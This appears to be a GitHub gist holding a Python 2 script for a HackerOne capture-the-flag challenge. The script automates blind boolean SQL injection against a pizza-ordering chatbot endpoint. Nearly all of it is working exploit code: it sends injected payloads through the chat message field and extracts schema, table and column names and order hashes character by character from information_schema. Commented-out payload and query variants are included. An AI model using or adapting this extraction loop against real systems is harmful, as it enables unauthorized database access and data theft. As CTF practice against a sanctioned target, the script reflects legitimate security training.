This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, json, time | |
| session = "aaa812cc572b27f73a336ccaf85277f9" | |
| def getChat(): | |
| url = "https://pizza.hacktivity.h1ctf.com/pizzabot?session={}&lastchat=0".format(session) | |
| r = requests.get(url, headers = { | |
| "Cookie": "session={}".format(session), | |
| "X-Requested-With": "XMLHttpRequest" | |
| }) | |
| data = json.loads(r.text) | |
| msg = data[-1]["message"] | |
| msg = msg.replace('<div><span class="talk-pizzabot">PizzaBot:</span> ', '').replace('</div>','') | |
| return msg | |
| def sendMsg(msg): | |
| url = "https://pizza.hacktivity.h1ctf.com/pizzabot" | |
| r = requests.post(url, headers = { | |
| "Cookie": "session={}".format(session), | |
| "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", | |
| "X-Requested-With": "XMLHttpRequest" | |
| }, data = { | |
| "session": session, | |
| "message": msg | |
| }) | |
| return r.text | |
| def sendSqli(query): | |
| # inject = "' or IF({},'true','false')='true".format(sqli) | |
| # inject = "'+ifnull(({}),'0juv2f98')+'".format(sqli) | |
| sendMsg('Order') | |
| chatMsg = getChat() | |
| time.sleep(0.5) | |
| if "Sorry I don't recognise that order ID" in chatMsg: | |
| sendMsg('Order') | |
| else: | |
| inject = "' or if(ifnull(({}),'1'),'1','0')='1".format(query) | |
| result = sendMsg(inject) | |
| sqliResult = getChat() | |
| print sqliResult | |
| if "Sorry I don't recognise that order ID" in sqliResult: | |
| return True | |
| elif "order is still out for delivery" in sqliResult: | |
| return False | |
| else: | |
| print "unknown result: {}".format(sqliResult) | |
| return True | |
| ''' | |
| information_schema | |
| h1pizza | |
| order | |
| delivered | |
| hash | |
| id | |
| id = 1001 | |
| hash = aau5.... | |
| delivered = 0/1 | |
| ''' | |
| def getData(): | |
| tblName = "" | |
| pos = 8 | |
| while True: | |
| # charSetToUse = list("$_abcdefghijklmnopqrstuvwxyz0123456789") | |
| # charSetToUse = list("0123456789") | |
| # charSetToUse = list("$_.!@#$%^&*()+-=,.<>") | |
| # charSetToUse = list("h1pizza") | |
| charSetToUse = list("0123456789abcdefghijklmnopqrstuvwxyz") | |
| for char in charSetToUse: | |
| if char == "_": | |
| char = "\_" | |
| tmpTblName = tblName+char | |
| # Get schema name: | |
| # query = "select schema_name from information_schema.schemata where schema_name='information_schema' limit 1" | |
| # query = "select schema_name from information_schema.schemata where schema_name not in('information_schema') and schema_name like 'h1pizza%' and substr(schema_name,"+str(pos)+",1) = '"+char+"' limit 1" | |
| # Get table name: | |
| # query = "select table_name from information_schema.tables where table_schema like 'h1pizza%' and table_name not in('') and lower(table_name) like '"+tmpTblName+"%' limit 1" | |
| # query = "select length(table_name) from information_schema.tables where table_schema LIKE 'h1pizza%' and length(table_name) LIKE '"+tmpTblName+"' limit 1" | |
| # get column names: | |
| # query = "select column_name from information_schema.columns where table_schema like 'h1pizza%' and table_name='order' and column_name not in('delivered','hash','id') and lower(column_name) like '"+tmpTblName+"%' limit 1" | |
| query = "select hash from h1pizza.order where delivered=1 and hash like '"+tmpTblName+"%' AND hash not in('ul2hamz1') limit 1" | |
| print query | |
| if(sendSqli(query)): | |
| tblName = tblName+char | |
| print tblName | |
| pos+=1 | |
| break | |
| getData() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment